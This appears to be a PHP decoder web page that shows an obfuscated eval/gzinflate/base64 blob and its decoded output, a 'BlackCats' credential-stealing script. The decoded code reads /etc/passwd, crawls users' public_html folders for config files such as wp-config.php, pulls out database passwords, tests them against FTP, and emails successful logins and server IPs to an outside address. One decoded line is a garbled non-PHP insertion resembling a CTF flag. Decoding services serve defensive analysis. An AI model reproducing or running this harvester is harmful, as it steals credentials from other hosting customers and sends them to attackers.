Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode('nVhtU9s4EP4cZvgPwpc5222wA72b3kCSo1dCy4eWHqH3heR8sq1gN7blk5TS..
Decoded Output download
echo '<html><head><title>BlackCats</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
@$flag = 2o24_M0t13Csc_C3rT_f1Ght1nG!
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
";
echo "[+] Founded ".sizeof($pub)." readable public_html directories
";
echo "[~] Searching for passwords in config files...
";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "
[+] Done
";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='common.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php')
or ($file=='admin/conf.php')
or ($file=="conf_global.php")
or ($file=="mk_conf.php")
or ($file=="config.php")
or ($file=="config.inc.php")
or ($file=="config.inc")
or ($file==".my.cnf")
or ($file=="*.php")
or ($file=="*config*")
or ($file=="admin/config.php")
or ($file=="include/config.php")
or ($file=="includes/config.php")
or ($file=="forum/includes/config.php")
or ($file=="vb/includes/config.php")
or ($file=="configuration.php")
or ($file=="whm/configuration.php")
or ($file=="whmc/configuration.php")
or ($file=="joomla/configuration.php")
or ($file=="configure.php")
or ($file=="/includes/configure.php")
or ($file=="config_global.php")
or ($file=="configuration.php")
or ($file=="conn.php")
or ($file=="connect.php")
or ($file=="connection.php")
or ($file=="connect.inc.php")
or ($file=="common.php")
or ($file=="common.inc.php")
or ($file=="database.php")
or ($file=="dbconf.php")
or ($file=="dbconfig.php")
or ($file=="dbconnect.php")
or ($file=="dbconnect.inc.php")
or ($file=="db_connection.inc.php")
or ($file=="db.inc.php")
or ($file=="db.php")
or ($file=="inc.php")
or ($file=="include/db.php")
or ($file=="dbase.php")
or ($file=="setting.php")
or ($file=="settings.php")
or ($file=="setup.php")
or ($file=="index.php")
or ($file=="e107_config.php")
or ($file=="../.my.cnf")
or ($file=="blog/wp-config.php"))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath
$pass
";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}
else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF BlackCats";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","hacks to http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor $login : $pass ok bro");
$_SESSION['bajak'] = 0;
}
echo '[FTP] '.$login.':'.$pass." Success !
";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br>Recoded by <b>G-one</b> & <b>punk</b> <a href=http://cyber-x.wap.sh>BlackCats Team</a></body></html>';Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode('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')));Function Calls
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | c192cc25c8de06050c27a217b1b1160b |
| Eval Count | 1 |
| Decode Time | 49 ms |